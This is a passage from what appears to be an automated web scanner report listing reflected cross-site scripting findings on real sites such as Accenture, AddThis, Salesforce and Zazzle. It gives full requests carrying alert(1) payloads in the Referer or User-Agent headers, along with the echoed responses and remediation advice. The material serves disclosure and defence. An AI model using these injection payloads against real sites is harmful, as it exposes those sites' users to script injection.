GET /accenture/registration/PrintThis.aspx?GUID={13DF5E01-389F-4013-BC36-296A775C1FE5}&footerGuid=9E541954-D5F8-4EC6-AF22-9FF473A55D70&authorContext=PresentationPublished&channelguid={4FDF0FFF-C188-490F-AEA1-A93A6B40D85B}&windowTitle=Submit HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Referer: dae01"%3balert(1)//ee29f38111e

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:47:08 GMT
Content-Length: 8044
Connection: close
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:47:08 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache

<title>Submit</title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>PrintThis</title>
       
       <meta content="Microsoft Visual Studio 7.0" name="GENERATOR">
...[SNIP]...
<script language="JavaScript" type="text/javascript">
var s_account="accaccenturecom,accglobal"
var currentPage="accenture/registration/printthis.aspx"
var formPageReferrer="accenture/registration/dae01";alert(1)//ee29f38111e"
</script>
...[SNIP]...

1.1416. https://www.accenture.com/accenture/registration/PrintThis.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /accenture/registration/PrintThis.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 750b6"%3balert(1)//fa0abef87abb5e8ef was submitted in the Referer HTTP header. This input was echoed as 750b6";alert(1)//fa0abef87abb5e8ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accenture/registration/PrintThis.aspx?GUID={13DF5E01-389F-4013-BC36-296A775C1FE5}&footerGuid=9E541954-D5F8-4EC6-AF22-9FF473A55D70&authorContext=PresentationPublished&channelguid={4FDF0FFF-C188-490F-AEA1-A93A6B40D85B}&windowTitle=Submit6a17b</title><x%20style%3dx%3aexpression(alert(1))>1898685ddda&button=show+response&renderableItem=%2Fshow%2F1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Cookie: Commerce2002_TestPersistentCookie=TestCookie; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; UserPref=Culture^en-US
Host: www.accenture.com
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US
Referer: 750b6"%3balert(1)//fa0abef87abb5e8ef

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 17:15:39 GMT
Connection: keep-alive
Set-Cookie: Commerce2002_TestSessionCookie=TestCookie; path=/
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 17:15:40 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache
Content-Length: 8224

<title>Submit6a17b</title><x style=x:expression(alert(1))>1898685ddda</title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>PrintThis</title>
       
       <meta
...[SNIP]...
<script language="JavaScript" type="text/javascript">
var s_account="accaccenturecom,accglobal"
var currentPage="accenture/registration/printthis.aspx"
var formPageReferrer="accenture/registration/750b6";alert(1)//fa0abef87abb5e8ef"
</script>
...[SNIP]...

1.1417. https://www.accenture.com/global/registration/careerssample [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /global/registration/careerssample

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c22f"%3balert(1)//0189a8276ee was submitted in the Referer HTTP header. This input was echoed as 3c22f";alert(1)//0189a8276ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global/registration/careerssample HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Referer: 3c22f"%3balert(1)//0189a8276ee

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:45:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:45:35 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache
Content-Length: 80136


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML
lang="en-US">
   <HEAD>
       <title>
           Accenture Careers Newsletter
       </title>
       <META http-equiv="Content-Type" content="te
...[SNIP]...
<script language="JavaScript" type="text/javascript">
var s_account="accaccenturecom,accglobal"
var currentPage="global/registration/careerssample.htm"
var formPageReferrer="accenture/templates/3c22f";alert(1)//0189a8276ee"
</script>
...[SNIP]...

1.1418. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload a64dc<script>alert(1)</script>10cad22189c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a64dc<script>alert(1)</script>10cad22189c

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 88727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<h4>a64dc<script>alert(1)</script>10cad22189c - Google search</h4>
...[SNIP]...

1.1419. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 442cb"><script>alert(1)</script>018cb7f919a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=442cb"><script>alert(1)</script>018cb7f919a

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:13:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 88741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=442cb"><script>alert(1)</script>018cb7f919a" />
...[SNIP]...

1.1420. http://www.pollingplacephotoproject.org/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pollingplacephotoproject.org
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload df6ad--><a>b09375b98aa was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: www.pollingplacephotoproject.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)df6ad--><a>b09375b98aa
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 21:44:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=1574839;expires=Tue, 13-Nov-2040 21:44:38 GMT;path=/
Set-Cookie: CFTOKEN=82044851;expires=Tue, 13-Nov-2040 21:44:38 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D1574839%26CFTOKEN%23%3D82044851%23lastvisit%3D%7Bts%20%272010%2D11%2D21%2016%3A44%3A38%27%7D%23timecreated%3D%7Bts%20%272010%2D11%2D21%2016%3A44%3A38%27%7D%23hitcount%3D2%23cftoken%3D82044851%23cfid%3D1574839%23;expires=Tue, 13-Nov-2040 21:44:38 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>


<title>Politics
...[SNIP]...
<!-- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)df6ad--><a>b09375b98aa -->
...[SNIP]...

1.1421. http://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eec27'-alert(1)-'9782758bfae was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servlet/servlet.WebToLead HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=eec27'-alert(1)-'9782758bfae

Response

HTTP/1.1 200 OK
Server: SFDC
Is-Processed: true
Content-Type: text/html
Date: Sun, 21 Nov 2010 21:38:44 GMT
Connection: close
Content-Length: 498

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en
...[SNIP]...
<script>
if (window.location.replace){
window.location.replace('http://www.google.com/search?hl=en&q=eec27'-alert(1)-'9782758bfae');
} else {;
window.location.href ='http://www.google.com/search?hl=en&q=eec27'-alert(1)-'9782758bfae';
}
</script>
...[SNIP]...

1.1422. https://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca287'-alert(1)-'079aae087be was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servlet/servlet.WebToLead HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ca287'-alert(1)-'079aae087be

Response

HTTP/1.1 200 OK
Server: SFDC
Is-Processed: true
Content-Type: text/html
Date: Sun, 21 Nov 2010 21:38:50 GMT
Connection: close
Content-Length: 498

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en
...[SNIP]...
<script>
if (window.location.replace){
window.location.replace('http://www.google.com/search?hl=en&q=ca287'-alert(1)-'079aae087be');
} else {;
window.location.href ='http://www.google.com/search?hl=en&q=ca287'-alert(1)-'079aae087be';
}
</script>
...[SNIP]...

1.1423. http://www.webwag.com/wwgthis.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.webwag.com
Path:   /wwgthis.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 4af02><script>alert(1)</script>a9e8cbe5cda was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /wwgthis.php HTTP/1.1
Host: www.webwag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4af02><script>alert(1)</script>a9e8cbe5cda

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:34:19 GMT
Server: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch13 Phusion_Passenger/2.2.5 mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch13
Set-Cookie: PHPSESSID=bb36741a5d28f27c11818016a3f6f51c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3465
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<a href=http://www.google.com/search?hl=en&q=4af02><script>alert(1)</script>a9e8cbe5cda>
...[SNIP]...

1.1424. http://www.windowsfordevices.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.windowsfordevices.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41a95"-alert(1)-"5a42f1c7a3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.windowsfordevices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=41a95"-alert(1)-"5a42f1c7a3

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:34:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: sessioncookie=ac1a0a1f12922eccd6347b350109d335; expires=Mon, 21-Nov-2011 21:34:53 GMT; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 21 Nov 2010 21:34:53 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 64122

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="STYLESHEET" type="text/css" href="/images/lfd.css" />
<link rel="STYLESHEET" type="text/css" href="/images/main
...[SNIP]...
<!--
s.pageName="WindowsForDevices.com Home"
s.referrer = "http://www.google.com/search?hl=en&q=41a95"-alert(1)-"5a42f1c7a3"
s.server=""
s.channel="WindowsForDevices.com Home"
s.pageType=""
s.prop1=""
s.prop2="Home"
s.prop3=""
s.prop4="WindowsForDevices.com Home"
s.prop5="Online"
s.prop6="WindowsForDevices.com Home"
s.prop
...[SNIP]...

1.1425. http://www.zazzle.com/geekdad_mug-168641877038204487 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zazzle.com
Path:   /geekdad_mug-168641877038204487

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 6217a<script>alert(1)</script>7a36fbe3a8c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /geekdad_mug-168641877038204487?gl=cerebus19&rf=238985042933680695 HTTP/1.1
Host: www.zazzle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6217a<script>alert(1)</script>7a36fbe3a8c

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 319439
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="CAO DSP COR CUR ADMa DEVa OUR BUS UNI PRE"
Set-Cookie: pis=1; path=/;
Set-Cookie: zm=AQABAAAAsgcAABT3zdmdFV5Q5YNeBpadQmTypyxhH4R7ljAG0LfgVFoINNoBSusOGdPmtd5T6YBC2q8YyVAiZeknrqjSdMioz6nHG9y7ai2LfdomU8tRyeS-iVQdqZrCGffxWfMCM398r49LK5-Y; domain=.zazzle.com; path=/
Set-Cookie: zs=4464E578-846B-4767-A5B0-FC39063A3D6D%7c0%7c12934848883%7c; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
Set-Cookie: us=A4B9D01E-9296-434B-ACF6-EECBAAE34EDA; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
Set-Cookie: general%5Fmaturity=1; domain=.zazzle.com; path=/
Set-Cookie: s=5245945739259350598; path=/
Date: Sun, 21 Nov 2010 21:34:42 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/html
...[SNIP]...
<a href="javascript://" id="zl7">Search: 6217a<script>alert(1)</script>7a36fbe3a8c</a>
...[SNIP]...

1.1426. http://www.zazzle.com/geekdad_mug-168641877038204487 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zazzle.com
Path:   /geekdad_mug-168641877038204487

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e88dd<script>alert(1)</script>e6db59895f8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /geekdad_mug-168641877038204487 HTTP/1.1
Host: www.zazzle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e88dd<script>alert(1)</script>e6db59895f8

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 319348
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="CAO DSP COR CUR ADMa DEVa OUR BUS UNI PRE"
Set-Cookie: BLITZEN-2612=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2614=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2616=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2618=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2620=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2622=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2700=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2702=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2704=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2706=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2708=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2710=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2712=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2714=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2716=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2718=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2720=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2722=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2800=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2802=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2804=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2806=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2808=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2810=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2812=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2814=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2816=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2818=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2820=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2822=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
